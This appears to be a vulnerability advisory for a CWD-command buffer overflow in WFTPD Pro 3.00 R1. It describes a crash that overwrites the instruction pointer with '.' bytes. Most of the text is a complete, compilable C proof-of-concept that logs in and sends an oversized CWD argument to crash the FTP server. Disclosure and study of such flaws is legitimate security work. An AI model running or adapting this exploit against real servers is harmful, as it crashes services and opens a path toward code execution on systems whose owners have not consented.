COMMAND

    WFTPD

SYSTEMS AFFECTED

    WFTPD Pro 3.00 R1

PROBLEM

    'se00020' reported the following.  When the CWD command is sent
    with a long argument (roughly 500 or more '.' characters) the server
    crashes with an access violation; the error text reads, in English:

        Exception fault at:
        0x2e2e2e2e
        reading from 0x2e2e2e2e is not possible...

    The fault address 0x2e2e2e2e is the filler byte '.' (0x2e) repeated
    four times, i.e. the instruction pointer is overwritten with data
    taken from the CWD argument, so executing arbitrary code is possible.
    Tested on Windows 2000 using the trial version of WFTPD Pro 3.00 R1.
    Note that the proof of concept below logs in as user "test" with an
    empty password before sending the CWD, so the crash was reproduced
    after a login attempt; whether an unauthenticated client reaches the
    same code path is not shown here.  Simple exploit:

    //WFTPD Pro 3.00 R1 Buffer Overflow exploit
    //written by se00020@fhs-hagenberg.ac.at
    
    #include <stdio.h>
    #include <string.h>
    #include <winsock.h>
    #include <windows.h>
    #include <malloc.h>
    
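    /* Length of the CWD line the original PoC built: "CWD " + 796 '.' bytes. */
    #define CWD_PAYLOAD_LEN 800
    #define TARGET_PORT     21
    /* Lab address hard-coded in the original PoC; used when no argv[1] is given. */
    #define DEFAULT_TARGET  "10.17.3.44"

    /*
     * Read and discard one server reply.  The content is deliberately not
     * inspected: the original PoC ignored the banner and login replies too,
     * and a vulnerable server never answers the final CWD at all.
     */
    static void drain_reply(SOCKET s)
    {
        char reply[1024];
        recv(s, reply, sizeof(reply), 0);
    }

    /*
     * Send a NUL-terminated command line as-is (the caller supplies "\r\n").
     * Returns 0 when every byte was handed to the socket, -1 otherwise.
     * Only the string itself is sent, never the surrounding buffer.
     */
    static int send_line(SOCKET s, const char *line)
    {
        int len = (int)strlen(line);
        return send(s, line, len, 0) == len ? 0 : -1;
    }

    /*
     * Proof of concept for the WFTPD Pro 3.00 R1 CWD buffer overflow.
     *
     * Connects to the target FTP server (argv[1], or DEFAULT_TARGET when no
     * argument is given), attempts "USER test" / empty "PASS", and then sends
     * a CWD command whose argument is 796 '.' characters.  Against a
     * vulnerable server this crashes the service with the instruction pointer
     * set to 0x2e2e2e2e, as reported in the advisory text.
     *
     * Returns 0 once the overflow line has been sent, 1 on any setup failure.
     */
    int main(int argc, char **argv)
    {
        const char *target = argc > 1 ? argv[1] : DEFAULT_TARGET;
        WSADATA wsadata;
        SOCKET sock_victim;
        struct sockaddr_in victim;
        /* payload + "\r\n" + terminating NUL */
        char buffer[CWD_PAYLOAD_LEN + 3];
        int rc = 1;

        if (WSAStartup(MAKEWORD(1, 1), &wsadata) != 0) {
            fprintf(stderr, "WSAStartup failed\n");
            return 1;
        }

        sock_victim = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (sock_victim == INVALID_SOCKET) {
            fprintf(stderr, "socket() failed: %d\n", WSAGetLastError());
            goto out_cleanup;
        }

        memset(&victim, 0, sizeof(victim));
        victim.sin_family = AF_INET;
        victim.sin_addr.s_addr = inet_addr(target);
        victim.sin_port = htons(TARGET_PORT);
        if (victim.sin_addr.s_addr == INADDR_NONE) {
            fprintf(stderr, "invalid target address: %s\n", target);
            goto out_close;
        }

        /* The original cast to (sockaddr*) only compiles as C++; use the C form. */
        if (connect(sock_victim, (struct sockaddr *)&victim, sizeof(victim)) == SOCKET_ERROR) {
            fprintf(stderr, "connect() to %s:%d failed: %d\n",
                    target, TARGET_PORT, WSAGetLastError());
            goto out_close;
        }

        drain_reply(sock_victim);                       /* banner */
        if (send_line(sock_victim, "USER test\r\n") < 0)
            goto out_close;
        drain_reply(sock_victim);
        if (send_line(sock_victim, "PASS\r\n") < 0)
            goto out_close;
        drain_reply(sock_victim);

        /*
         * Build "CWD " + 796 '.' + "\r\n" directly in a correctly sized,
         * NUL-terminated buffer.  The original filled all 800 bytes of its
         * staging array with no terminator and then sprintf()'d it, reading
         * past the array; it also sent sizeof(buffer) bytes, pushing
         * uninitialized stack data after the command.
         */
        memcpy(buffer, "CWD ", 4);
        memset(buffer + 4, '.', CWD_PAYLOAD_LEN - 4);
        memcpy(buffer + CWD_PAYLOAD_LEN, "\r\n", 3);    /* copies the NUL too */

        if (send_line(sock_victim, buffer) < 0)
            goto out_close;
        /* A vulnerable server dies here; recv() returns on reset/close. */
        drain_reply(sock_victim);
        rc = 0;

    out_close:
        /* The original also called closesocket() on connect()'s return value,
         * which is a status code, not a socket handle. */
        closesocket(sock_victim);
    out_cleanup:
        WSACleanup();
        return rc;
    }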

SOLUTION

    The author of WFTPD has been contacted; no fixed version is listed
    in this advisory.